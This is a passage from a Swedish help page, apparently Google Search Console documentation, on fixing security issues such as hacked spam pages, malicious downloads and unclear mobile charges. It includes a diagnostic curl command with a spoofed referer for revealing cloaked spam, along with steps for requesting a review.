  • Med cURL eller Wget kan du skicka HTTP-begäranden (som att hämta en sida) från kommandoraden. Dessa gratisverktyg kan vara till hjälp när omdirigeringar ska diagnostiseras och de kan specificera hänvisningsadressen eller information om användaragenten. Det är vanligt att hackare försöker undvika upptäckt och välja bättre mål genom att endast attackera specifika användaragenter eller hänvisningsadresser. Med dessa verktyg kan du efterlikna ett mål. Testa att använda olika hänvisningsadresser (till exempel länkar från stora webbplatser eller olika sökmotorer) om din begäran inte framkallar spaminnehållet. Om du till exempel vill efterlikna en användare som följer en länk från en resultat på Google Sök till www.example.com/page.html på en Windows-dator kan du använda cURL så här:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Begär exempeladresserna som anges i rapporten och se om de är aktiva. Du har förmodligen inte skapat de sidorna själv, så du behöver ta bort dem från webbplatsen eller bli av med den kod som genererar sidorna automatiskt. Läs mer hur du hittar sidor av det här slaget på webbplatsen och rensar bort dem.

Du kan också göra en sökning med site: och titta efter sidor som inte är dina.

  • Om det gäller en liten webbplats kan du söka på [site:example.com] på Google Sök. Då visas en lista med sidor som vi har indexerat. Där kan du se om det finns sidor som inte du har skapat.
  • På en större webbplats kan du använda en mer exakt sökfråga. Exempel:
    • [site:example.com läkemedel] – Visa alla sidor som innehåller ordet läkemedel på example.com. Ersätt ”läkemedel” med andra söktermer som brukar förekomma i spam.
    • [site:example.com/wp-admin/] – Visa alla sidor i administratörsdelen av en WordPress-webbplats.

3. Rensa webbplatsen

När du är klar att rensa webbplatsen kan du antingen ersätta de drabbade katalogerna med den senaste säkerhetskopian före angreppet eller ta bort de oönskade sidorna och alla filer eller funktioner som hackaren använde för att skapa dem.

Dessutom:

  • Läs guiden för hackade webbplatser, där du hittar ett komplett arbetsflöde för hur webbplatsen ska åtgärdas, inklusive hur du rensar den och hur du kan förhindra att den blir hackad på nytt.

4. Begär granskning

När du är säker på att problemet har åtgärdats på webbplatsen begär du en säkerhetsgranskning via rapporten om säkerhetsproblem. Granskningen kan ta allt från ett par dagar till ett par veckor.

Ovanliga nedladdningar

En fil som Google Säker webbsökning inte känner igen går att ladda ned på webbplatsen. Det kan visas en varning i webbläsaren Chrome där det står att detta inte är något som brukar laddas ned och kan vara farligt. Dessa varningar tas bort automatiskt om Google Säker webbsökning kan verifiera att filerna är säkra.

1. Åtgärda problemet

Kontrollera om de nedladdningsbara filerna följer riktlinjerna för nedladdning. Om någon av nedladdningarna strider mot riktlinjerna tar du bort den. Om de inte strider mot riktlinjerna behöver du inte ta bort dem. Begär bara granskning enligt nedan. Observera att det inte alltid finns några exempeladresser vid den här typen av problem.

2. Begär granskning

När du har tagit bort alla filer som behövs (eller kontrollerat att de följer riktlinjerna) begär du en säkerhetsgranskning via rapporten om säkerhetsproblem. Granskningen kan ta allt från ett par dagar till ett par veckor.

Skadliga nedladdningar

Användarna kan ladda ned något som Google Säker webbsökning klassar som skadlig eller oönskad programvara på din webbplats. En varning kan visas i webbläsaren Chrome när någon försöker besöka din webbplats. Om du vill att varningen ska tas bort måste du ta bort dessa nedladdningar från webbplatsen.

1. Bilda dig en uppfattning om problemet

Om du visste att nedladdningarna fanns på webbplatsen tar du bort dem och hoppar till Begär granskning.

Om du inte kände till att detta gick att ladda ned på webbplatsen kan den ha blivit hackad. Åtgärda den hackade webbplatsen först och sök sedan efter nedladdningarna och ta bort dem.

2. Avgör om det här är något som du kan åtgärda själv

Med hjälp av artikeln om hur du sätter samman ett supportteam kan du bilda dig en uppfattning om vad som krävs för att själv åtgärda detta eller hur du kan få hjälp om du känner att det överstiger din förmåga.

3. Kontrollera problemet

Besök några av exempelsidorna där nedladdningarna finns på webbplatsen.

4. Rensa webbplatsen

Läs guiden för hackade webbplatser, där du hittar ett komplett arbetsflöde för hur webbplatsen ska åtgärdas, inklusive hur du rensar den och hur du kan förhindra att den blir hackad på nytt. När du är klar att rensa webbplatsen kan du antingen ersätta de drabbade filerna med den senaste säkerhetskopian före angreppet eller ta bort skräpinnehållet själv. Sök igenom binärfiler och annat innehåll på webbplatsen med hjälp av antivirusprogram. Antivirusprogrammen kan hitta många typer av skadlig och oönskad programvara, men tyvärr inte alla. Att överföra programvaran till ett antivirusprogram (eller en antivirustjänst som VirusTotal) kan ge en indikation på om det finns problem med programvaran. Google Säker webbsökning avgör om ett program eller en binärfil är oönskad eller skadlig programvara utifrån egna kriterier.

5. Kontrollera åtgärderna

Kontrollera att webbplatsen följer policyn mot oönskad programvara.

6. Begär granskning

När du är säker på att problemet har åtgärdats på webbplatsen begär du en säkerhetsgranskning via rapporten om säkerhetsproblem. Granskningen kan ta allt från ett par dagar till ett par veckor.

Länkar till skadliga nedladdningar

Det finns länkar på din webbplats som leder till webbplatser där det går att ladda ned skadlig eller oönskad programvara enligt Google Säker webbsökning. En varning kan visas i webbläsaren Chrome när någon försöker besöka din webbplats. Om du vill att varningen ska tas bort måste du ta bort länkarna till de skadliga webbplatserna.

1. Bilda dig en uppfattning om problemet

Om du visste att länkarna fanns på webbplatsen tar du bort dem och hoppar till Begär granskning.

Om du inte kände till att länkarna fanns där kan webbplatsen ha blivit hackad.

2. Avgör om det här är något som du kan åtgärda själv

Om webbplatsen har blivit hackad kan du bilda dig en uppfattning om vad som krävs för att själv åtgärda detta, eller hur du kan få hjälp om du känner att det överstiger din förmåga, med hjälp av artikeln om hur du sätter samman ett supportteam.

3. Kontrollera problemet

 

Besök några av exempelsidorna där nedladdningarna finns på webbplatsen. I vissa fall kan hackaren ha gömt länkarna för webbplatsens ägare, så testa att besöka exempeladresserna med granskningsverktyget för webbadresser eller att logga in med ett annat konto eller på en annan dator.

4. Rensa webbplatsen

Läs guiden för hackade webbplatser, där du hittar ett komplett arbetsflöde för hur webbplatsen ska åtgärdas, inklusive hur du rensar den och hur du kan förhindra att den blir hackad på nytt. När du är klar att rensa webbplatsen kan du antingen ersätta de drabbade filerna med den senaste säkerhetskopian före angreppet eller ta bort skräpinnehållet själv.

5. Kontrollera åtgärderna

Kontrollera att webbplatsen följer policyn mot oönskad programvara.

6. Begär granskning

När du är säker på att problemet har åtgärdats på webbplatsen begär du en säkerhetsgranskning via rapporten om säkerhetsproblem. Granskningen kan ta allt från ett par dagar till ett par veckor.

Otydliga mobilavgifter

Google har upptäckt att webbplatsen inte gör tillräckligt för att informera användarna om att mobilavgifter tillkommer. En varning visas då i Chrome innan användaren läser in en avgiftsbelagd sida.

1. Kontrollera problemet

Besök exempeladresserna som anges i rapporten och se vilka sidor som problemet med otydliga mobilavgifter förekommer på. Läs riktlinjerna för mobilfakturering här.

2. Åtgärda problemet

Åtgärda sidorna så att de följer rekommendationerna vid mobilfakturering.

3. Begär granskning

När du är säker på att problemet har åtgärdats på webbplatsen begär du en säkerhetsgranskning via rapporten om säkerhetsproblem. Granskningen kan ta allt från ett par dagar till ett par veckor.

Vad är skillnaden mellan rapporten Manuella åtgärder och rapporten Säkerhetsproblem?

De problem som visas i rapporten Manuella åtgärder handlar oftast om försök att manipulera vårt sökindex, men de är inte nödvändigtvis farliga för användarna. De flesta problem som rapporteras här resulterar i att sidorna eller webbplatsen får en lägre placering eller tas bort från sökresultat utan att detta visas för användare.

I rapporten Säkerhetsproblem visas indikeringar på att webbplatsen har blivit hackad eller att det finns en risk att webbplatsen skadar besökare eller deras datorer genom exempelvis nätfiskeattacker eller att installera skadlig eller oönskad programvara på användarens dator. Sådana sidor visas med en varningsmärkning i sökresultaten eller så visas en varningssida för hela webbplatsen i webbläsaren när besökaren försöker öppna dem.

Var det här till hjälp?
Hur kan vi förbättra den?